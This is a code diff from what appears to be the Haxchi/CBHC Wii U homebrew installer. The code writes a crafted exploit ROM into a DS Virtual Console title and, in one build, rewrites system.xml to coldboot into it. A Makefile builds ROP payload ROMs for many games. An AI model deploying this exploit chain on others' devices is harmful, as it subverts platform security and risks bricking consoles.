+		}
+		goto prgEnd;
+	}
+#endif
+	int ret = IOSUHAX_FSA_Mount(fsaFd, "/dev/sdcard01", sdCardVolPath, 2, (void*)0, 0);
+	if(ret < 0)
+	{
+		println(line++,"Failed to mount SD!");
+		goto prgEnd;
+	}
+	else
+		sdMounted = 1;
+	char path[256];
+	sprintf(path,"%s/content/0010/rom.zip",SelectedGame->path);
+	if(IOSUHAX_FSA_OpenFile(fsaFd, path, "rb", &mlcFd) < 0)
+	{
+		println(line++,"No already existing rom.zip found in the game!");
+		println(line++,"Make sure to re-install your DS title and try again.");
+		goto prgEnd;
+	}
+	else
+		IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
+	if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
+	{
+		println(line++,"Writing rom.zip...");
+		fsa_write(fsaFd, mlcFd, SelectedGame->romPtr, SelectedGame->romSize);
+		IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
+		mlcFd = -1;
+	}
+
+	char sdHaxchiPath[256];
+#ifdef CB
+	sprintf(sdHaxchiPath,"%s/cbhc",sdCardVolPath);
+#else
+	sprintf(sdHaxchiPath,"%s/haxchi",sdCardVolPath);
+#endif
+	char sdPath[256];
+
+#ifndef CB
+	sprintf(sdPath,"%s/config.txt",sdHaxchiPath);
+	if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
+	{
+		//read in sd file
+		fileStat_s stats;
+		IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
+		size_t cfgSize = stats.size;
+		uint8_t *cfgBuf = MEMBucket_alloc(cfgSize,4);
+		fsa_read(fsaFd, sdFd, cfgBuf, cfgSize);
+		IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
+		sdFd = -1;
+		//write to nand
+		sprintf(path,"%s/content/config.txt",SelectedGame->path);
+		if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
+		{
+			println(line++,"Writing config.txt...");
+			fsa_write(fsaFd, mlcFd, cfgBuf, cfgSize);
+			IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
+			mlcFd = -1;
+			//make it readable by game
+			IOSUHAX_FSA_ChangeMode(fsaFd, path, 0x644);
+		}
+		MEMBucket_free(cfgBuf);
+	}
+#endif
+
+	sprintf(sdPath,"%s/title.txt",sdHaxchiPath);
+	if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
+	{
+		//read in sd file
+		fileStat_s stats;
+		IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
+		size_t titleSize = stats.size;
+		xmlChar *titleBuf = MEMBucket_alloc(titleSize+1,4);
+		memset(titleBuf, 0, titleSize+1);
+		fsa_read(fsaFd, sdFd, titleBuf, titleSize);
+		IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
+		sdFd = -1;
+		sprintf(path,"%s/meta/meta.xml",SelectedGame->path);
+		if(IOSUHAX_FSA_OpenFile(fsaFd, path, "rb", &mlcFd) >= 0)
+		{
+			IOSUHAX_FSA_StatFile(fsaFd, mlcFd, &stats);
+			size_t metaSize = stats.size;
+			char *metaBuf = MEMBucket_alloc(metaSize,4);
+			fsa_read(fsaFd, mlcFd, metaBuf, metaSize);
+			IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
+			mlcFd = -1;
+			//parse doc
+			xmlDocPtr doc = xmlReadMemory(metaBuf, metaSize, "meta.xml", "utf-8", 0);
+			//change title
+			xmlNode *root_element = xmlDocGetRootElement(doc);
+			xmlNode *cur_node = NULL;
+			for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
+				if (cur_node->type == XML_ELEMENT_NODE) {
+					if(memcmp(cur_node->name, "longname_", 9) == 0 || memcmp(cur_node->name, "shortname_", 10) == 0)
+					{
+						if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
+						xmlNodeSetContent(cur_node, titleBuf);
+					}
+				}
+			}
+			//back to xml
+			xmlChar *newXml = NULL;
+			int newSize = 0;
+			xmlSaveNoEmptyTags = 1; //keeps original style
+			xmlDocDumpFormatMemoryEnc(doc, &newXml, &newSize, "utf-8", 0);
+			xmlFreeDoc(doc);
+			if(newXml != NULL && newSize > 0)
+			{
+				//libxml2 adds in extra \n at the end
+				if(newXml[newSize-1] == '\n' && metaBuf[metaSize-1] != '\n')
+				{
+					newXml[newSize-1] = '\0';
+					newSize--;
+				}
+				//write back to nand
+				if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
+				{
+					println(line++,"Changing game title...");
+					//UTF-8 BOM
+					char bom[3] = { 0xEF, 0xBB, 0xBF };
+					if(memcmp(newXml, bom, 3) != 0 && memcmp(metaBuf, bom, 3) == 0)
+						fsa_write(fsaFd, mlcFd, bom, 0x03);
+					fsa_write(fsaFd, mlcFd, newXml, newSize);
+					IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
+					mlcFd = -1;
+				}
+				free(newXml);
+			}
+			MEMBucket_free(metaBuf);
+		}
+		MEMBucket_free(titleBuf);
+	}
+
+	sprintf(sdPath,"%s/bootDrcTex.tga",sdHaxchiPath);
+	if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
+	{
+		//read in sd file
+		fileStat_s stats;
+		IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
+		size_t bootDrcTexSize = stats.size;
+		uint8_t *bootDrcTex = MEMBucket_alloc(bootDrcTexSize,4);
+		fsa_read(fsaFd, sdFd, bootDrcTex, bootDrcTexSize);
+		IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
+		sdFd = -1;
+		//write to nand
+		sprintf(path,"%s/meta/bootDrcTex.tga",SelectedGame->path);
+		if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
+		{
+			println(line++,"Writing bootDrcTex.tga...");
+			fsa_write(fsaFd, mlcFd, bootDrcTex, bootDrcTexSize);
+			IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
+			mlcFd = -1;
+		}
+		MEMBucket_free(bootDrcTex);
+	}
+
+	sprintf(sdPath,"%s/bootTvTex.tga",sdHaxchiPath);
+	if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
+	{
+		//read in sd file
+		fileStat_s stats;
+		IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
+		size_t bootTvTexSize = stats.size;
+		uint8_t *bootTvTex = MEMBucket_alloc(bootTvTexSize,4);
+		fsa_read(fsaFd, sdFd, bootTvTex, bootTvTexSize);
+		IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
+		sdFd = -1;
+		//write to nand
+		sprintf(path,"%s/meta/bootTvTex.tga",SelectedGame->path);
+		if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
+		{
+			println(line++,"Writing bootTvTex.tga...");
+			fsa_write(fsaFd, mlcFd, bootTvTex, bootTvTexSize);
+			IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
+			mlcFd = -1;
+		}
+		MEMBucket_free(bootTvTex);
+	}
+
+	sprintf(sdPath,"%s/iconTex.tga",sdHaxchiPath);
+	if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
+	{
+		//read in sd file
+		fileStat_s stats;
+		IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
+		size_t iconTexSize = stats.size;
+		uint8_t *iconTex = MEMBucket_alloc(iconTexSize,4);
+		fsa_read(fsaFd, sdFd, iconTex, iconTexSize);
+		IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
+		sdFd = -1;
+		//write to nand
+		sprintf(path,"%s/meta/iconTex.tga",SelectedGame->path);
+		if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
+		{
+			println(line++,"Writing iconTex.tga...");
+			fsa_write(fsaFd, mlcFd, iconTex, iconTexSize);
+			IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
+			mlcFd = -1;
+		}
+		MEMBucket_free(iconTex);
+	}
+
+	sprintf(sdPath,"%s/bootSound.btsnd",sdHaxchiPath);
+	if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
+	{
+		//read in sd file
+		fileStat_s stats;
+		IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
+		size_t bootSoundSize = stats.size;
+		uint8_t *bootSound = MEMBucket_alloc(bootSoundSize,4);
+		fsa_read(fsaFd, sdFd, bootSound, bootSoundSize);
+		IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
+		sdFd = -1;
+		//write to nand
+		sprintf(path,"%s/meta/bootSound.btsnd",SelectedGame->path);
+		if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
+		{
+			println(line++,"Writing bootSound.btsnd...");
+			fsa_write(fsaFd, mlcFd, bootSound, bootSoundSize);
+			IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
+			mlcFd = -1;
+		}
+		MEMBucket_free(bootSound);
+	}
+
+#ifdef CB
+	if(IOSUHAX_FSA_OpenFile(fsaFd, systemXmlPath, "rb", &slcFd) >= 0)
+	{
+		//read in system xml file
+		fileStat_s stats;
+		IOSUHAX_FSA_StatFile(fsaFd, slcFd, &stats);
+		size_t sysXmlSize = stats.size;
+		char *sysXmlBuf = MEMBucket_alloc(sysXmlSize+1,4);
+		memset(sysXmlBuf, 0, sysXmlSize+1);
+		fsa_read(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
+		IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
+		slcFd = -1;
+		xmlDocPtr doc = xmlReadMemory(sysXmlBuf, sysXmlSize, "system.xml", "utf-8", 0);
+		//change default title id
+		int idFound = 0, idCorrect = 0;
+		xmlNode *root_element = xmlDocGetRootElement(doc);
+		xmlNode *cur_node = NULL;
+		for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
+			if (cur_node->type == XML_ELEMENT_NODE) {
+				if(memcmp(cur_node->name, "default_title_id", 17) == 0)
+				{
+					if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
+					if(memcmp(sysmenuId, (char*)xmlNodeGetContent(cur_node), 17) == 0) idCorrect++;
+					idFound++;
+				}
+			}
+		}
+		if(idFound != 1)
+			println(line++,"default_title_id missing!");
+		else if(idCorrect != 1)
+			println(line++,"default_title_id not set to System Menu!");
+		else
+		{
+			int xmlBackedUp = 0;
+			if(IOSUHAX_FSA_OpenFile(fsaFd, syshaxXmlPath, "rb", &slcFd) < 0)
+			{
+				//write syshax.xml
+				if(IOSUHAX_FSA_OpenFile(fsaFd, syshaxXmlPath, "wb", &slcFd) >= 0)
+				{
+					println(line++,"Writing syshax.xml...");
+					fsa_write(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
+					xmlBackedUp = 1;
+					IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
+					slcFd = -1;
+				}
+			}
+			else
+			{
+				println(line++,"syshax.xml already found, skipping...");
+				xmlBackedUp = 1;
+				IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
+				slcFd = -1;
+			}
+			if(xmlBackedUp == 0)
+				println(line++,"Failed to back up system.xml!");
+			else
+			{
+				idFound = 0, idCorrect = 0;
+				root_element = xmlDocGetRootElement(doc);
+				cur_node = NULL;
+				for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
+					if (cur_node->type == XML_ELEMENT_NODE) {
+						if(memcmp(cur_node->name, "default_title_id", 17) == 0)
+						{
+							if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
+							if(memcmp(sysmenuId, (char*)xmlNodeGetContent(cur_node), 17) == 0)
+							{
+								xmlNodeSetContent(cur_node, (xmlChar*)new_title_id);
+								idCorrect++;
+							}
+							idFound++;
+						}
+					}
+				}
+				if(idFound != 1)
+					println(line++,"default_title_id missing!");
+				else if(idCorrect != 1)
+					println(line++,"default_title_id not set to System Menu!");
+				else
+				{
+					//back to xml
+					xmlChar *newXml = NULL;
+					int newSize = 0;
+					xmlSaveNoEmptyTags = 0; //yep, different from meta.xml style
+					xmlDocDumpFormatMemoryEnc(doc, &newXml, &newSize, "utf-8", 0);
+					xmlFreeDoc(doc);
+					if(newXml != NULL && newSize > 0)
+					{
+						//libxml2 adds in extra \n at the end
+						if(newXml[newSize-1] == '\n' && sysXmlBuf[sysXmlSize-1] != '\n')
+						{
+							newXml[newSize-1] = '\0';
+							newSize--;
+						}
+						//write back to nand
+						if(IOSUHAX_FSA_OpenFile(fsaFd, systemXmlPath2, "wb", &slcFd) >= 0)
+						{
+							println(line++,"Writing system.xml...");
+							//UTF-8 BOM
+							char bom[3] = { 0xEF, 0xBB, 0xBF };
+							if(memcmp(newXml, bom, 3) != 0 && memcmp(sysXmlBuf, bom, 3) == 0)
+								fsa_write(fsaFd, slcFd, bom, 0x03);
+							fsa_write(fsaFd, slcFd, newXml, newSize);
+							IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
+							slcFd = -1;
+						}
+						free(newXml);
+					}
+				}
+			}
+		}
+		MEMBucket_free(sysXmlBuf);
+	}
+	println(line++,"Done installing CBHC!");
+#else
+	println(line++,"Done installing Haxchi!");
+#endif
+
+WHBLogPrintf("Success");	
+WHBLogConsoleDraw();
+
+prgEnd:
+	if(tList) //cant be in MEMBucket
+		free(tList);	
+	//close trigger everything fsa related
+	if(fsaFd >= 0)
+	{
+		if(slcFd >= 0)
+			IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
+		if(mlcFd >= 0)
+			IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
+		if(sdFd >= 0)
+			IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
+		if(sdMounted)
+			IOSUHAX_FSA_Unmount(fsaFd, sdCardVolPath, 2);
+		
+		if(IOSUHAX_FSA_FlushVolume(fsaFd, "/vol/storage_mlc01") == 0)
+			println(line++, "Flushed NAND Cache!");
+		
+		IOSUHAX_FSA_Close(fsaFd);
+	}
+
+	IOSUHAX_Close();
+	
+	sleep(5);
+	
+	OSForceFullRelaunch();
+	ProcUIShutdown();
+	
+	memoryRelease();
+	WHBLogConsoleFree();	
+	SYSRelaunchTitle(0, NULL);
+	WHBProcShutdown();
+	
+	return 0;
+}

haxchi_installer/src/main.h

@@ -0,0 +1,19 @@
+//Main.h
+#ifndef _MAIN_H_
+#define _MAIN_H_
+
+#include <stdint.h>
+
+/* Main */
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+//! C wrapper for our C++ functions
+int Menu_Main(void);
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif

haxchi_installer/src/memory.c

@@ -0,0 +1,185 @@
+/****************************************************************************
+ * Copyright (C) 2015 Dimok
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ ****************************************************************************/
+#include <malloc.h>
+#include <string.h>
+#include <coreinit/memheap.h>
+#include <coreinit/memfrmheap.h>
+#include <coreinit/memexpheap.h>
+#include "memory.h"
+
+#define MEMORY_ARENA_1          0
+#define MEMORY_ARENA_2          1
+#define MEMORY_ARENA_3          2
+#define MEMORY_ARENA_4          3
+#define MEMORY_ARENA_5          4
+#define MEMORY_ARENA_6          5
+#define MEMORY_ARENA_7          6
+#define MEMORY_ARENA_8          7
+#define MEMORY_ARENA_FG_BUCKET  8
+
+//!----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+//! Memory functions
+//! This is the only place where those are needed so lets keep them more or less private
+//!----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+static MEMHeapHandle mem1_heap = NULL;
+static MEMHeapHandle bucket_heap = NULL;
+
+void memoryInitialize(void) {
+    if(!mem1_heap) {
+        MEMHeapHandle mem1_heap_handle = MEMGetBaseHeapHandle(MEMORY_ARENA_1);
+        unsigned int mem1_allocatable_size = MEMGetAllocatableSizeForFrmHeapEx(mem1_heap_handle, 4);
+        void *mem1_memory = MEMAllocFromFrmHeapEx(mem1_heap_handle, mem1_allocatable_size, 4);
+        if(mem1_memory)
+            mem1_heap = MEMCreateExpHeapEx(mem1_memory, mem1_allocatable_size, 0);
+    }
+
+    if(!bucket_heap) {
+        MEMHeapHandle bucket_heap_handle = MEMGetBaseHeapHandle(MEMORY_ARENA_FG_BUCKET);
+        unsigned int bucket_allocatable_size = MEMGetAllocatableSizeForFrmHeapEx(bucket_heap_handle, 4);
+        void *bucket_memory = MEMAllocFromFrmHeapEx(bucket_heap_handle, bucket_allocatable_size, 4);
+        if(bucket_memory)
+            bucket_heap = MEMCreateExpHeapEx(bucket_memory, bucket_allocatable_size, 0);
+    }
+}
+
+void memoryRelease(void) {
+    if(mem1_heap) {
+        MEMDestroyExpHeap(mem1_heap);
+        MEMFreeToFrmHeap(MEMGetBaseHeapHandle(MEMORY_ARENA_1), 3);
+        mem1_heap = NULL;
+    }
+    if(bucket_heap) {
+        MEMDestroyExpHeap(bucket_heap);
+        MEMFreeToFrmHeap(MEMGetBaseHeapHandle(MEMORY_ARENA_FG_BUCKET), 3);
+        bucket_heap = NULL;
+    }
+}
+/*
+//!-------------------------------------------------------------------------------------------
+//! wraps
+//!-------------------------------------------------------------------------------------------
+void *__wrap_malloc(size_t size)
+{
+    // pointer to a function resolve
+	return ((void * (*)(size_t))(*pMEMAllocFromDefaultHeap))(size);
+}
+
+void *__wrap_memalign(size_t align, size_t size)
+{
+    if (align < 4)
+        align = 4;
+
+    // pointer to a function resolve
+    return ((void * (*)(size_t, size_t))(*pMEMAllocFromDefaultHeapEx))(size, align);
+}
+
+void __wrap_free(void *p)
+{
+    // pointer to a function resolve
+    if(p != 0)
+        ((void (*)(void *))(*pMEMFreeToDefaultHeap))(p);
+}
+
+void *__wrap_calloc(size_t n, size_t size)
+{
+    void *p = __wrap_malloc(n * size);
+	if (p != 0) {
+		memset(p, 0, n * size);
+	}
+	return p;
+}
+
+size_t __wrap_malloc_usable_size(void *p)
+{
+    //! TODO: this is totally wrong and needs to be addressed
+	return 0x7FFFFFFF;
+}
+
+void *__wrap_realloc(void *p, size_t size)
+{
+    void *new_ptr = __wrap_malloc(size);
+	if (new_ptr != 0)
+	{
+		memcpy(new_ptr, p, __wrap_malloc_usable_size(p) < size ? __wrap_malloc_usable_size(p) : size);
+		__wrap_free(p);
+	}
+	return new_ptr;
+}
+
+//!-------------------------------------------------------------------------------------------
+//! reent versions
+//!-------------------------------------------------------------------------------------------
+void *__wrap__malloc_r(struct _reent *r, size_t size)
+{
+	return __wrap_malloc(size);
+}
+
+void *__wrap__calloc_r(struct _reent *r, size_t n, size_t size)
+{
+    return __wrap_calloc(n, size);
+}
+
+void *__wrap__memalign_r(struct _reent *r, size_t align, size_t size)
+{
+    return __wrap_memalign(align, size);
+}
+
+void __wrap__free_r(struct _reent *r, void *p)
+{
+    __wrap_free(p);
+}
+
+size_t __wrap__malloc_usable_size_r(struct _reent *r, void *p)
+{
+    return __wrap_malloc_usable_size(p);
+}
+
+void *__wrap__realloc_r(struct _reent *r, void *p, size_t size)
+{
+    return __wrap_realloc(p, size);
+}
+*/
+//!-------------------------------------------------------------------------------------------
+//! some wrappers
+//!-------------------------------------------------------------------------------------------
+void * MEM2_alloc(unsigned int size, unsigned int align) {
+    return memalign(align, size);
+}
+
+void MEM2_free(void *ptr) {
+    free(ptr);
+}
+
+void * MEM1_alloc(unsigned int size, unsigned int align) {
+    if (align < 4)
+        align = 4;
+    return MEMAllocFromExpHeapEx(mem1_heap, size, align);
+}
+
+void MEM1_free(void *ptr) {
+    MEMFreeToExpHeap(mem1_heap, ptr);
+}
+
+void * MEMBucket_alloc(unsigned int size, unsigned int align) {
+    if (align < 4)
+        align = 4;
+    return MEMAllocFromExpHeapEx(bucket_heap, size, align);
+}
+
+void MEMBucket_free(void *ptr) {
+    MEMFreeToExpHeap(bucket_heap, ptr);
+}

haxchi_installer/src/memory.h

@@ -0,0 +1,42 @@
+/****************************************************************************
+ * Copyright (C) 2015 Dimok
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ ****************************************************************************/
+#ifndef __MEMORY_H_
+#define __MEMORY_H_
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+#include <malloc.h>
+
+void memoryInitialize(void);
+void memoryRelease(void);
+
+void * MEM2_alloc(unsigned int size, unsigned int align);
+void MEM2_free(void *ptr);
+
+void * MEM1_alloc(unsigned int size, unsigned int align);
+void MEM1_free(void *ptr);
+
+void * MEMBucket_alloc(unsigned int size, unsigned int align);
+void MEMBucket_free(void *ptr);
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif // __MEMORY_H_

payload_generator/.gitignore

@@ -0,0 +1,5 @@
+*.nds
+*.zip
+*.bin
+defines.s
+haxchi_installer/src/zipList.h

payload_generator/Makefile

@@ -0,0 +1,268 @@
+.PHONY := all code550.bin
+
+ifeq ($(Windows_NT), 1)
+	ZIP = zip/zip.exe
+else
+	ZIP = zip
+endif
+
+HAXCHI_S = haxchi.s
+ROP_S = haxchi_rop.s
+COREINIT_S = coreinit.s
+ROP_BIN = haxchi_rop.bin
+
+RELEASE  = ../haxchi_installer
+TARGET_PATH  = $(RELEASE)/data
+BUILD  = build
+DEFINES  = defines
+
+all: setup animalcrossing brainage dkjclimber guardiansigns kirby kirbymassattack mariokartds masterofdisguise newsmb_eur partnersintime \
+	pokemonranger sfcommand sm64ds yoshids zeldaph zeldast \
+	animalcrossing.zip brainage.zip dkjclimber.zip guardiansigns.zip kirby.zip kirbymassattack.zip mariokartds.zip masterofdisguise.zip \
+	newsmb_eur.zip partnersintime.zip pokemonranger.zip sfcommand.zip sm64ds.zip yoshids.zip zeldaph.zip zeldast.zip
+
+animalcrossing: setup_animalcrossing animalcrossing.nds
+
+brainage: setup_brainage brainage.nds
+
+dkjclimber: setup_dkjclimber dkjclimber.nds
+
+guardiansigns: setup_guardiansigns guardiansigns.nds
+
+kirby: setup_kirby kirby.nds
+
+kirbymassattack: setup_kirbymassattack kirbymassattack.nds
+
+mariokartds: setup_mariokartds mariokartds.nds
+
+masterofdisguise: setup_masterofdisguise masterofdisguise.nds
+
+newsmb_eur: setup_newsmb_eur newsmb_eur.nds
+
+partnersintime: setup_partnersintime partnersintime.nds
+
+pokemonranger: setup_pokemonranger pokemonranger.nds
+
+sfcommand: setup_sfcommand sfcommand.nds
+
+sm64ds: setup_sm64ds sm64ds.nds
+
+yoshids: setup_yoshids yoshids.nds
+
+zeldaph: setup_zeldaph zeldaph.nds
+
+zeldast: setup_zeldast zeldast.nds
+
+setup:	
+	mkdir -p $(TARGET_PATH)
+	mkdir -p $(BUILD)
+
+setup_animalcrossing:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/animalcrossing_defs.s defines.s
+
+setup_brainage:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/brainage_defs.s defines.s
+
+setup_dkjclimber:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/dkjclimber_defs.s defines.s
+
+setup_guardiansigns:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/guardiansigns_defs.s defines.s
+
+setup_kirby:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/kirby_defs.s defines.s
+
+setup_kirbymassattack:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/kirbymassattack_defs.s defines.s
+
+setup_mariokartds:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/mariokartds_defs.s defines.s
+
+setup_masterofdisguise:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/masterofdisguise_defs.s defines.s
+
+setup_newsmb_eur:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/newsmb_eur_defs.s defines.s
+
+setup_pokemonranger:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/pokemonranger_defs.s defines.s
+
+setup_partnersintime:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/partnersintime_defs.s defines.s
+
+setup_sfcommand:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/sfcommand_defs.s defines.s
+
+setup_sm64ds:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/sm64ds_defs.s defines.s
+
+setup_yoshids:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/yoshids_defs.s defines.s
+
+setup_zeldaph:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/zeldaph_defs.s defines.s
+
+setup_zeldast:
+	@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
+	@cp -f $(DEFINES)/zeldast_defs.s defines.s
+
+animalcrossing.nds:	
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/animalcrossing.nds
+
+brainage.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/brainage.nds
+	@cp $(BUILD)/brainage.nds $(BUILD)/yoshitouchandgo.nds
+
+dkjclimber.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/dkjclimber.nds
+
+guardiansigns.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/guardiansigns.nds
+
+kirby.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/kirby.nds
+
+kirbymassattack.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/kirbymassattack.nds
+
+mariokartds.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/mariokartds.nds
+	@cp $(BUILD)/mariokartds.nds $(BUILD)/newsmb.nds
+
+masterofdisguise.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/masterofdisguise.nds
+
+newsmb_eur.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/newsmb_eur.nds
+
+pokemonranger.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/pokemonranger.nds
+
+partnersintime.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/partnersintime.nds
+
+sfcommand.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/sfcommand.nds
+
+sm64ds.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/sm64ds.nds
+	@cp $(BUILD)/sm64ds.nds $(BUILD)/kirbycanvascurse.nds
+
+yoshids.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/yoshids.nds
+	@cp $(BUILD)/yoshids.nds $(BUILD)/wwtouched.nds
+	@cp $(BUILD)/yoshids.nds $(BUILD)/bigbrainacademy.nds
+
+zeldaph.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/zeldaph.nds
+
+zeldast.nds:
+	@armips $(ROP_S)
+	@armips $(HAXCHI_S)
+	@mv rom.nds $(BUILD)/zeldast.nds
+	@cp $(BUILD)/zeldast.nds $(BUILD)/explorersofsky.nds
+	@cp $(BUILD)/zeldast.nds $(BUILD)/shadowsofalmia.nds
+
+animalcrossing.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/animalcrossing.zip $(BUILD)/animalcrossing.nds
+
+brainage.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/brainage.zip $(BUILD)/brainage.nds
+	$(ZIP) -JXjq9 $(TARGET_PATH)/yoshitouchandgo.zip $(BUILD)/yoshitouchandgo.nds
+
+dkjclimber.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/dkjclimber.zip $(BUILD)/dkjclimber.nds
+
+guardiansigns.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/guardiansigns.zip $(BUILD)/guardiansigns.nds
+
+kirby.zip:
+	$(ZIP) -JXjq9 $(TARGET_PATH)/kirby.zip $(BUILD)/kirby.nds
+
+kirbymassattack.zip:
